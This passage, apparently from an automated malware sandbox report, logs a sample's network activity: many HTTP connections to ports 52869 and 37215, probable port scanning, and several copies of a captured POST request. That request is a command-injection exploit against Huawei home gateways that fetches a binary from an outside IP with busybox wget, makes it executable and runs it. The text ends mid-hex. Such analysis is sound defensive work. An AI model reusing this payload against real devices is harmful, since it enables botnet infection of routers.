Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57466
Source: unknown	Network traffic detected: HTTP traffic on port 57468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57468
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45032 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40054 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54250 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54250 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54250 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 91.254.99.65 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 91.186.147.224 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 91.21.105.249 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 185.174.174.71 ports 2,5,6,8,9,52869

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 